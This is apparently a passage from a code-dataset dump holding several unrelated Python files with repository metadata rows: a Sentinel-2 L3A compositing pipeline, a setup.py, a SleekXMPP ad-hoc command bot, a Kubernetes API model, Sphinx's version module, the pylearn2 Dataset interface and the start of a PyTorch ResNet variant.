logging.info(synthdates_str)
result_list = []
logging.info(window_size)
synth_halflength = math.ceil(window_size / 2)
# length of the synthesis in days (half)
logging.info(synth_halflength)
for tile in tile_dict.keys():
# Fetch L2A imagery for tile (all dates)
imagery_list = []
for d in all_dates:
l2a_exists = check_l2a_imagery_exists(d, tile, aoi_name)
logging.info("intermediate_l2a_exists")
logging.info(l2a_exists)
if l2a_exists.status:
logging.info(
f"\nFor date {d}, prev l2a exists {tile}, trying to download...\n"
)
l2a_download_result = s3_helper.download_l2a_from_s3(
str(Path(aoi_name, "sentinel2", l2a_exists[1])), INPUT_BUCKET_NAME
)
logging.info(l2a_download_result)
if l2a_download_result.status:
imagery_list.append(d)
else:
return TaskStatus(
False,
"There was a problem downloading the l2a imagery",
l2a_exists.message,
)
else:
return TaskStatus(False, "missing l2a imagery, job aborted.", None)
for d in synthdates_str:
logging.info(f"creating composite for tile {tile} and date {d}")
result = create_l3a_composite(
d, synth_halflength, tile, imagery_list, window_size
)
result_list.append(result)
# find l3a result
product_path = None
for f in os.listdir(OUTPUT_FOLDER_PATH):
if f.find("S2AGRI_L3A") != -1:
product_path = Path(OUTPUT_FOLDER_PATH, f)
break
if product_path:
upload_result = s3_helper.upload_unarchived_product_to_s3(
product_path, aoi_name, OUTPUT_BUCKET_NAME
)
else:
upload_result = TaskStatus(
False,
"L3A product could not be found, there was a problem in L3A Creation",
None,
)
if upload_result.status:
shutil.rmtree(product_path)
clean_up_folder(WORKING_FOLDER_PATH)
clean_up_folder(INPUT_FOLDER_PATH)
clean_up_folder(OUTPUT_FOLDER_PATH)
if upload_result.status:
logging.info(upload_result)
logging.info("created composite and uploaded to s3")
result_list.append(TaskStatus(True, f"{tile} - {d}", ""))
else:
logging.info("there was a problem with uploading the composite product")
result_list.append(
TaskStatus(False, f"{tile} - {d}", upload_result.message)
)
return result_list
def start_l3a_job(imagery_list, job_id, aoi_name, window_size=3, maja_ver="3.2.2"):
"""Given the list of input imagery, start the job processes
Major Steps:
1. Generate date array from input imagery list
2. Generate command for each date from 0 to n
3. Run command for date 0
3. Check if expected L2A output exists on S3 bucket, if not:
3. Retrieve l1c imagery for date 0 from S3 bucket, if l1c imagery cannot be found, entire job fails, extract zip
3. Run demmaccs.py for date 0
3. Upload l2a output to S3 bucket
3. Delete local working dir contents
4. Run next command for date 1 to n
4. Check if expected L2A exists on S3 bucket, if not:
4. Retrieve l1c imagery for date i from S3 bucket, if l1c imagery cannot be found, entire job fails, extract zip
4. Retrieve l2a imagery for date i-1, date i-2, date i-3
3. Run demmaccs.py for date i
3. Upload l2a output to S3 bucket
4. Delete local working dir contents
5. If all commands complete successfully, report job complete
6. Else report job failure
imagery list format example:
JSON:
"parameters": {
"aoi_name": "Test Area 2",
"window_size": 3,
"imagery_list": {
"sentinel2": {
"20190613": [
"S2A_MSIL1C_20190613T182921_N0207_R027_T12UUA_20190613T220508"
],
"20190616": [],
"20190618": [
"S2B_MSIL1C_20190618T182929_N0207_R027_T12UUA_20190618T220500"
],
"20190621": [],
"20190623": [],
"20190626": [],
"20190628": [
"S2B_MSIL1C_20190628T182929_N0207_R027_T12UUA_20190628T221748"
],
"20190701": [],
"20190703": [
"S2A_MSIL1C_20190703T182921_N0207_R027_T12UUA_20190703T220857"
],
"20190706": [],
"20190718": [
"S2B_MSIL1C_20190718T182929_N0208_R027_T12UUA_20190718T220349"
],
"20190721": []
}
}
"""
conv_imagery_list = {}
imagery_list = imagery_list["sentinel2"]
for (key, value) in imagery_list.items():
if len(value) > 0:
conv_imagery_list[key] = []
for img in value:
# S2A_MSIL1C_20190703T182921_N0207_R027_T12UUA_20190703T2328
conv_imagery_list[key].append(img)
print(conv_imagery_list)
# Todo: add checks for existing products (to prevent redundant work)
task = generate_l3a.s(conv_imagery_list, window_size, aoi_name)
logging.info(task)
task_result = task.apply_async().get()
json_result = json.dumps(task_result)
return json_result
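# Illustrative call sketch (the job_id value is hypothetical; the other values come
# from the docstring example above):
#   start_l3a_job(parameters["imagery_list"], job_id="42",
#                 aoi_name="Test Area 2", window_size=3)
# The return value is the JSON-serialized list of TaskStatus results from generate_l3a.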
| 31.308793
| 333
| 0.640105
|
a6047653f7cce9f3731b72c27200720cda412b59
| 258
|
py
|
Python
|
ex08/jennyssecretmessage_vs.py
|
Wassila211/Checkpoint00
|
b46319e754f43b2d7f97cf2135d014f55b46ae16
|
[
"MIT"
] | null | null | null |
ex08/jennyssecretmessage_vs.py
|
Wassila211/Checkpoint00
|
b46319e754f43b2d7f97cf2135d014f55b46ae16
|
[
"MIT"
] | null | null | null |
ex08/jennyssecretmessage_vs.py
|
Wassila211/Checkpoint00
|
b46319e754f43b2d7f97cf2135d014f55b46ae16
|
[
"MIT"
] | null | null | null |
prenom = input("What is your first name?\n")
if prenom == "Johnny":
    print("I hate you!")
if prenom == "Paul":
    print("Hello my love!")
if prenom == "Marc":
    print("Hello my love!")
if prenom == "Ismael":
    print("Hi, sorry, I don't have time to talk to you")
| 25.8
| 49
| 0.643411
|
6e9c92bcdfadb6c41f04583475255c841fdf17e8
| 2,040
|
py
|
Python
|
setup.py
|
fenriques/AstroDom
|
84b54d3299cf591c39b214248339a201ae8ae6ca
|
[
"MIT"
] | 8
|
2020-05-17T14:57:08.000Z
|
2020-12-20T12:29:43.000Z
|
setup.py
|
fenriques/AstroDom
|
84b54d3299cf591c39b214248339a201ae8ae6ca
|
[
"MIT"
] | 2
|
2020-06-04T20:49:09.000Z
|
2020-09-04T12:35:07.000Z
|
setup.py
|
fenriques/AstroDom
|
84b54d3299cf591c39b214248339a201ae8ae6ca
|
[
"MIT"
] | null | null | null |
############################################################
# -*- coding: utf-8 -*-
#
# Astroimaging catalogue software
#
# Ferrante Enriques
# (c) 2020
#
# License MIT
#
###########################################################
from setuptools import setup, find_packages
import codecs
import os
def read(rel_path):
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, rel_path), "r") as fp:
return fp.read()
def get_version(rel_path):
for line in read(rel_path).splitlines():
if line.startswith("__version__"):
# __version__ = "0.9"
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
else:
raise RuntimeError("Unable to find version string.")
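# Illustrative sketch (hypothetical file contents): if astrodom/__init__.py contains a
# line such as __version__ = "0.9", then get_version("astrodom/__init__.py") returns "0.9";
# if no such line is found, the for/else clause raises RuntimeError.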
long_description = read("README.md")
setup(
name="astrodom",
version=get_version("astrodom/__init__.py"),
packages=find_packages(),
python_requires=">=3.6, <3.9",
install_requires=[
"astropy==4.0",
"matplotlib==3.1.3",
"PyQt5==5.13.2",
"pyqtgraph==0.10.0",
"numpy==1.18.2",
"pandas==1.0.3"
],
include_package_data=True,
url="https://github.com/fenriques/AstroDom",
license="MIT",
author="Ferrante Enriques",
author_email="ferrante.enriques@gmail.com",
description="Astroimaging Catalogue Software",
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: X11 Applications :: Qt",
"Environment :: Other Environment",
"Programming Language :: Python :: 3 :: Only",
"Operating System :: Microsoft :: Windows :: Windows 10",
"Operating System :: POSIX :: Linux",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Astronomy",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
],
)
| 29.142857
| 65
| 0.580392
|
a72158c3abf5d2c00d58cdd369f0b26c5c1bca43
| 7,434
|
py
|
Python
|
examples/adhoc_provider.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
"BSD-3-Clause"
] | null | null | null |
examples/adhoc_provider.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
"BSD-3-Clause"
] | null | null | null |
examples/adhoc_provider.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
from optparse import OptionParser
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf8')
else:
raw_input = input
class CommandBot(sleekxmpp.ClientXMPP):
"""
A simple SleekXMPP bot that provides a basic
adhoc command.
"""
def __init__(self, jid, password):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
# The session_start event will be triggered when
# the bot establishes its connection with the server
# and the XML streams are ready for use. We want to
        # listen for this event so that we can initialize
# our roster.
self.add_event_handler("session_start", self.start)
def start(self, event):
"""
Process the session_start event.
Typical actions for the session_start event are
requesting the roster and broadcasting an initial
presence stanza.
Arguments:
event -- An empty dictionary. The session_start
event does not provide any additional
data.
"""
self.send_presence()
self.get_roster()
# We add the command after session_start has fired
# to ensure that the correct full JID is used.
# If using a component, may also pass jid keyword parameter.
self['xep_0050'].add_command(node='greeting',
name='Greeting',
handler=self._handle_command)
def _handle_command(self, iq, session):
"""
Respond to the initial request for a command.
Arguments:
iq -- The iq stanza containing the command request.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
form = self['xep_0004'].makeForm('form', 'Greeting')
form['instructions'] = 'Send a custom greeting to a JID'
form.addField(var='greeting',
ftype='text-single',
label='Your greeting')
session['payload'] = form
session['next'] = self._handle_command_complete
session['has_next'] = False
# Other useful session values:
# session['to'] -- The JID that received the
# command request.
# session['from'] -- The JID that sent the
# command request.
# session['has_next'] = True -- There are more steps to complete
# session['allow_complete'] = True -- Allow user to finish immediately
# and possibly skip steps
# session['cancel'] = handler -- Assign a handler for if the user
# cancels the command.
# session['notes'] = [ -- Add informative notes about the
# ('info', 'Info message'), command's results.
# ('warning', 'Warning message'),
# ('error', 'Error message')]
return session
def _handle_command_complete(self, payload, session):
"""
Process a command result from the user.
Arguments:
payload -- Either a single item, such as a form, or a list
of items or forms if more than one form was
provided to the user. The payload may be any
stanza, such as jabber:x:oob for out of band
data, or jabber:x:data for typical data forms.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
# In this case (as is typical), the payload is a form
form = payload
greeting = form['values']['greeting']
self.send_message(mto=session['from'],
mbody="%s, World!" % greeting,
mtype='chat')
# Having no return statement is the same as unsetting the 'payload'
# and 'next' session values and returning the session.
# Unless it is the final step, always return the session dictionary.
session['payload'] = None
session['next'] = None
return session
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
# Setup the CommandBot and register plugins. Note that while plugins may
# have interdependencies, the order in which you register them does
# not matter.
xmpp = CommandBot(opts.jid, opts.password)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0004') # Data Forms
xmpp.register_plugin('xep_0050') # Adhoc Commands
xmpp.register_plugin('xep_0199', {'keepalive': True, 'frequency':15})
# If you are working with an OpenFire server, you may need
# to adjust the SSL version used:
# xmpp.ssl_version = ssl.PROTOCOL_SSLv3
# If you want to verify the SSL certificates offered by a server:
# xmpp.ca_certs = "path/to/ca/cert"
# Connect to the XMPP server and start processing XMPP stanzas.
if xmpp.connect():
# If you do not have the dnspython library installed, you will need
# to manually specify the name of the server if it does not match
# the one in the JID. For example, to use Google Talk you would
# need to use:
#
# if xmpp.connect(('talk.google.com', 5222)):
# ...
xmpp.process(block=True)
print("Done")
else:
print("Unable to connect.")
| 36.263415
| 78
| 0.581383
|
31042d92f25f01f6e17ad8928ac9af0c89b28136
| 4,338
|
py
|
Python
|
kubernetes_asyncio/client/models/v1_host_path_volume_source.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_host_path_volume_source.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_host_path_volume_source.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.14.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1HostPathVolumeSource(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'path': 'str',
'type': 'str'
}
attribute_map = {
'path': 'path',
'type': 'type'
}
def __init__(self, path=None, type=None): # noqa: E501
"""V1HostPathVolumeSource - a model defined in OpenAPI""" # noqa: E501
self._path = None
self._type = None
self.discriminator = None
self.path = path
if type is not None:
self.type = type
@property
def path(self):
"""Gets the path of this V1HostPathVolumeSource. # noqa: E501
Path of the directory on the host. If the path is a symlink, it will follow the link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:return: The path of this V1HostPathVolumeSource. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this V1HostPathVolumeSource.
Path of the directory on the host. If the path is a symlink, it will follow the link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:param path: The path of this V1HostPathVolumeSource. # noqa: E501
:type: str
"""
if path is None:
raise ValueError("Invalid value for `path`, must not be `None`") # noqa: E501
self._path = path
@property
def type(self):
"""Gets the type of this V1HostPathVolumeSource. # noqa: E501
Type for HostPath Volume Defaults to \"\" More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:return: The type of this V1HostPathVolumeSource. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this V1HostPathVolumeSource.
Type for HostPath Volume Defaults to \"\" More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:param type: The type of this V1HostPathVolumeSource. # noqa: E501
:type: str
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1HostPathVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 30.125
| 196
| 0.58391
|
6a2bcb25b07dd7947c822080c078d6886310af58
| 2,016
|
py
|
Python
|
sphinx/__init__.py
|
daobook/sphinx
|
ef8daca1f9a82ede9b4b0b5cde93f3414cee3dfe
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/__init__.py
|
daobook/sphinx
|
ef8daca1f9a82ede9b4b0b5cde93f3414cee3dfe
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/__init__.py
|
daobook/sphinx
|
ef8daca1f9a82ede9b4b0b5cde93f3414cee3dfe
|
[
"BSD-2-Clause"
] | null | null | null |
"""The Sphinx documentation toolchain."""
# Keep this file executable as-is in Python 3!
# (Otherwise getting the version out of it from setup.py is impossible.)
import os
import subprocess
import warnings
from os import path
from subprocess import PIPE
from .deprecation import RemovedInNextVersionWarning
# By default, all DeprecationWarnings under the sphinx package will be emitted.
# Users can avoid this by setting the environment variable PYTHONWARNINGS=
if 'PYTHONWARNINGS' not in os.environ:
warnings.filterwarnings('default', category=RemovedInNextVersionWarning)
# docutils.io using mode='rU' for open
warnings.filterwarnings('ignore', "'U' mode is deprecated",
DeprecationWarning, module='docutils.io')
__version__ = '4.5.0+'
__released__ = '4.5.0' # used when Sphinx builds its own docs
#: Version info for better programmatic use.
#:
#: A tuple of five elements; for Sphinx version 1.2.1 beta 3 this would be
#: ``(1, 2, 1, 'beta', 3)``. The fourth element can be one of: ``alpha``,
#: ``beta``, ``rc``, ``final``. ``final`` always has 0 as the last element.
#:
#: .. versionadded:: 1.2
#: Before version 1.2, check the string ``sphinx.__version__``.
version_info = (4, 5, 0, 'beta', 0)
package_dir = path.abspath(path.dirname(__file__))
__display_version__ = __version__ # used for command line version
if __version__.endswith('+'):
# try to find out the commit hash if checked out from git, and append
# it to __version__ (since we use this value from setup.py, it gets
# automatically propagated to an installed copy as well)
__display_version__ = __version__
__version__ = __version__[:-1] # remove '+' for PEP-440 version spec.
try:
ret = subprocess.run(['git', 'show', '-s', '--pretty=format:%h'],
cwd=package_dir,
stdout=PIPE, stderr=PIPE, encoding='ascii')
if ret.stdout:
__display_version__ += '/' + ret.stdout.strip()
except Exception:
pass
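# Illustrative sketch (hypothetical commit hash): starting from __version__ == '4.5.0+',
# a git checkout at commit deadbee ends up with __version__ == '4.5.0' and
# __display_version__ == '4.5.0+/deadbee'; if git is unavailable, __display_version__
# simply stays '4.5.0+'.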
| 38.769231
| 76
| 0.679563
|
911c9688b93c6dad7b4867213b8981b6376d6ab2
| 2,284
|
py
|
Python
|
geometry_analysis/molecule.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
geometry_analysis/molecule.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
geometry_analysis/molecule.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
"""
molecule.py
A python package for the MolSSI Software Summer School.
Contains a molecule class
"""
import numpy as np
from .measure import calculate_angle, calculate_distance
class Molecule:
def __init__(self, name, symbols, coordinates):
if isinstance(name, str):
self.name = name
else:
raise TypeError("Name is not a string.")
self.symbols = symbols
self._coordinates = coordinates
self.bonds = self.build_bond_list()
@property
def num_atoms(self):
return len(self.coordinates)
@property
def coordinates(self):
return self._coordinates
@coordinates.setter
def coordinates(self, new_coordinates):
self._coordinates = new_coordinates
self.bonds = self.build_bond_list()
def build_bond_list(self, max_bond=2.93, min_bond=0):
"""
Build a list of bonds based on a distance criteria.
Atoms within a specified distance of one another will be considered bonded.
Parameters
----------
        max_bond : float, optional
            Maximum distance for two atoms to be considered bonded. Default is 2.93.
        min_bond : float, optional
            Minimum distance for two atoms to be considered bonded. Default is 0.
Returns
-------
bond_list : list
List of bonded atoms. Returned as list of tuples where the values are the atom indices.
"""
bonds = {}
for atom1 in range(self.num_atoms):
for atom2 in range(atom1, self.num_atoms):
distance = calculate_distance(self.coordinates[atom1], self.coordinates[atom2])
if distance > min_bond and distance < max_bond:
bonds[(atom1, atom2)] = distance
return bonds
if __name__ == "__main__":
# Do something if this file is invoked on its own
#pass
random_coordinates = np.random.random([3, 3])
name = "my molecule"
symbols = ["H", "O", "H"]
my_molecule = Molecule(name, symbols, random_coordinates)
print(F'There are {len(my_molecule.bonds)} bonds')
print(F'The coordinates are {my_molecule.coordinates}')
#random_coordinates = np.random.random([3, 3])
random_coordinates[0] += 100
my_molecule.coordinates = random_coordinates
print(F'\n\nThe coordinates are {my_molecule.coordinates}')
print(F'There are {len(my_molecule.bonds)} bonds')
| 28.55
| 99
| 0.637916
|
d3bf9c9f8ef5235bf700fee144c566f3582c3f57
| 9,221
|
py
|
Python
|
pylearn2/datasets/dataset.py
|
BouchardLab/pylearn2
|
4cab785b870d22cd9e85a5f536d4cac234b6bf60
|
[
"BSD-3-Clause"
] | null | null | null |
pylearn2/datasets/dataset.py
|
BouchardLab/pylearn2
|
4cab785b870d22cd9e85a5f536d4cac234b6bf60
|
[
"BSD-3-Clause"
] | null | null | null |
pylearn2/datasets/dataset.py
|
BouchardLab/pylearn2
|
4cab785b870d22cd9e85a5f536d4cac234b6bf60
|
[
"BSD-3-Clause"
] | null | null | null |
"""
A module defining the Dataset class.
"""
class Dataset(object):
"""
Abstract interface for Datasets.
"""
def __iter__(self):
"""
.. todo::
WRITEME
"""
return self.iterator()
def iterator(self, mode=None, batch_size=None, num_batches=None,
rng=None, data_specs=None, return_tuple=False):
"""
Return an iterator for this dataset with the specified
behaviour. Unspecified values are filled-in by the default.
Parameters
----------
mode : str or object, optional
One of 'sequential', 'random_slice', or 'random_uniform',
*or* a class that instantiates an iterator that returns
slices or index sequences on every call to next().
batch_size : int, optional
The size of an individual batch. Optional if `mode` is
'sequential' and `num_batches` is specified (batch size
will be calculated based on full dataset size).
num_batches : int, optional
The total number of batches. Unnecessary if `mode` is
'sequential' and `batch_size` is specified (number of
batches will be calculated based on full dataset size).
rng : int, object or array_like, optional
Either an instance of `numpy.random.RandomState` (or
something with a compatible interface), or a seed value
to be passed to the constructor to create a `RandomState`.
See the docstring for `numpy.random.RandomState` for
details on the accepted seed formats. If unspecified,
defaults to using the dataset's own internal random
number generator, which persists across iterations
through the dataset and may potentially be shared by
multiple iterator objects simultaneously (see "Notes"
below).
data_specs : (space, source) pair, optional
`space` must be an instance of `Space` and `source` must be
a string or tuple of string names such as 'features' or
'targets'. The source names specify where the data will come
from and the Space specifies its format.
When source is a tuple, there are some additional requirements:
* `space` must be a `CompositeSpace`, with one sub-space
corresponding to each source name. i.e., the specification
must be flat.
* None of the components of `space` may be a `CompositeSpace`.
* Each corresponding (sub-space, source name) pair must be
unique, but the same source name may be mapped to many
sub-spaces (for example if one part of the model is fully
connected and expects a `VectorSpace`, while another part is
convolutional and expects a `Conv2DSpace`).
If `data_specs` is not provided, the behaviour (which
sources will be present, in which order and space, or
whether an Exception will be raised) is not defined and may
depend on the implementation of each `Dataset`.
return_tuple : bool, optional
In case `data_specs` consists of a single space and source,
if `return_tuple` is True, the returned iterator will return
a tuple of length 1 containing the minibatch of the data
at each iteration. If False, it will return the minibatch
itself. This flag has no effect if data_specs is composite.
Default: False.
Returns
-------
iter_obj : object
An iterator object implementing the standard Python
iterator protocol (i.e. it has an `__iter__` method that
            returns the object itself, and a `next()` method that
returns results until it raises `StopIteration`).
The `next()` method returns a batch containing data for
each of the sources required in `data_specs`, in the requested
`Space`.
Notes
-----
Arguments are passed as instantiation parameters to classes
that derive from `pylearn2.utils.iteration.SubsetIterator`.
Iterating simultaneously with multiple iterator objects
sharing the same random number generator could lead to
difficult-to-reproduce behaviour during training. It is
therefore *strongly recommended* that each iterator be given
its own random number generator with the `rng` parameter
in such situations.
When it is valid to call the `iterator` method with the default
value for all arguments, it makes it possible to use the `Dataset`
itself as an Python iterator, with the default implementation of
`Dataset.__iter__`. For instance, `DenseDesignMatrix` supports a
value of `None` for `data_specs`.
"""
# TODO: See how much of the logic from DenseDesignMatrix.iterator
# can be handled here.
raise NotImplementedError()
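    # Illustrative data_specs sketch (hypothetical spaces, not defined in this module):
    # a model wanting 784-dimensional features and 10-dimensional targets could pass
    #   data_specs = (CompositeSpace([VectorSpace(784), VectorSpace(10)]),
    #                 ('features', 'targets'))
    # i.e. a flat CompositeSpace paired with one source name per sub-space, as the
    # docstring above requires.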
def adjust_for_viewer(self, X):
"""
Shift and scale a tensor, mapping its data range to [-1, 1].
It makes it possible for the transformed tensor to be displayed
with `pylearn2.gui.patch_viewer` tools.
Default is to do nothing.
Parameters
----------
X: `numpy.ndarray`
a tensor in the same space as the data
Returns
-------
`numpy.ndarray`
X shifted and scaled by a transformation that maps the data
range to [-1, 1].
Notes
-----
For example, for MNIST X will lie in [0,1] and the return value
should be X*2-1
"""
return X
def has_targets(self):
""" Returns true if the dataset includes targets """
raise NotImplementedError()
def get_topo_batch_axis(self):
"""
Returns the index of the axis that corresponds to different examples
in a batch when using topological_view.
"""
# Subclasses that support topological view must implement this to
# specify how their data is formatted.
raise NotImplementedError()
def get_batch_design(self, batch_size, include_labels=False):
"""
Returns a randomly chosen batch of data formatted as a design
matrix.
This method is not guaranteed to have any particular properties
like not repeating examples, etc. It is mostly useful for getting
a single batch of data for a unit test or a quick-and-dirty
visualization. Using this method for serious learning code is
strongly discouraged. All code that depends on any particular
example sampling properties should use Dataset.iterator.
.. todo::
Refactor to use `include_targets` rather than `include_labels`,
to make the terminology more consistent with the rest of the
library.
Parameters
----------
batch_size : int
The number of examples to include in the batch.
include_labels : bool
If True, returns the targets for the batch, as well as the
features.
Returns
-------
batch : member of feature space, or member of (feature, target) space.
Either numpy value of the features, or a (features, targets) tuple
of numpy values, depending on the value of `include_labels`.
"""
raise NotImplementedError(str(type(self)) + " does not implement "
"get_batch_design.")
def get_batch_topo(self, batch_size, include_labels=False):
"""
Returns a topology-preserving batch of data.
This method is not guaranteed to have any particular properties
like not repeating examples, etc. It is mostly useful for getting
a single batch of data for a unit test or a quick-and-dirty
visualization. Using this method for serious learning code is
strongly discouraged. All code that depends on any particular
example sampling properties should use Dataset.iterator.
.. todo::
Refactor to use `include_targets` rather than `include_labels`,
to make the terminology more consistent with the rest of the
library.
Parameters
----------
batch_size : int
The number of examples to include in the batch.
include_labels : bool
If True, returns the targets for the batch, as well as the
features.
Returns
-------
batch : member of feature space, or member of (feature, target) space.
Either numpy value of the features, or a (features, targets) tuple
of numpy values, depending on the value of `include_labels`.
"""
raise NotImplementedError()
def get_num_examples(self):
"""
Returns the number of examples in the dataset
Notes
-----
Infinite datasets have float('inf') examples.
"""
raise NotImplementedError()
| 39.917749
| 78
| 0.622167
|
7662bd41d1d62deeb34d070ff8d14168fb0edb77
| 19,315
|
py
|
Python
|
lib/models/multi_resnetohkm.py
|
sumaliqinghua/DSPNet
|
e82cc1938af65234471b6a139a8ac51f22de32a6
|
[
"MIT"
] | 5
|
2020-12-04T05:50:09.000Z
|
2022-01-14T12:37:44.000Z
|
lib/models/multi_resnetohkm.py
|
sumaliqinghua/DSPNet
|
e82cc1938af65234471b6a139a8ac51f22de32a6
|
[
"MIT"
] | 1
|
2021-01-28T03:20:00.000Z
|
2021-01-28T03:20:00.000Z
|
lib/models/multi_resnetohkm.py
|
sumaliqinghua/DSPNet
|
e82cc1938af65234471b6a139a8ac51f22de32a6
|
[
"MIT"
] | 3
|
2020-12-02T03:18:59.000Z
|
2021-09-12T11:29:19.000Z
|
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
# import os
import pprint
import os
import logging
import torch
import torch.nn as nn
# 【c】how is this hooked up, and how would it be swapped for something else?
BN_MOMENTUM = 0.1  # momentum of the BatchNorm layers, not the Adam one
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(
in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False
)
class Depthwise(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, padding=1, bias=False):
super(Depthwise, self).__init__()
self.conv_group = nn.Conv2d(in_planes, in_planes, kernel_size=kernel_size, stride=stride,
padding=padding, groups=in_planes, bias=bias)
self.conv_1x1 = nn.Conv2d(
in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
x = self.conv_group(x)
x = self.conv_1x1(x)
return x
class DwTrans(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=2, padding=1, output_padding=0, bias=False):
super(DwTrans, self).__init__()
self.in_channels = in_channels
self.conv_group = nn.ConvTranspose2d(
in_channels=in_channels,
out_channels=in_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
output_padding=output_padding,
groups=in_channels,
bias=False
)
self.conv_1x1 = nn.Conv2d(
in_channels, out_channels, kernel_size=1, bias=False)
def forward(self, x):
# print(self.in_channels)
x = self.conv_group(x)
x = self.conv_1x1(x)
return x
# class SSEBlock(nn.Module):
# def __init__(self, inchannel):
# super(SSEBlock, self).__init__()
# self.spatial_se = nn.Sequential(nn.Conv2d(inchannel, 1, kernel_size=1,
# stride=1, padding=0, bias=False),
# nn.Sigmoid())
# def forward(self, x):
# # Returns a new tensor with the same data as the self tensor but of a different size.
#         spa_se = self.spatial_se(x)  # the attention weights
#         # spa_se = torch.mul(x, spa_se)  # result after applying the weights; needed only if each branch is used independently
# return spa_se
# class SEBlock(nn.Module):
# def __init__(self, channel, reduction=16):
# super(SEBlock, self).__init__()
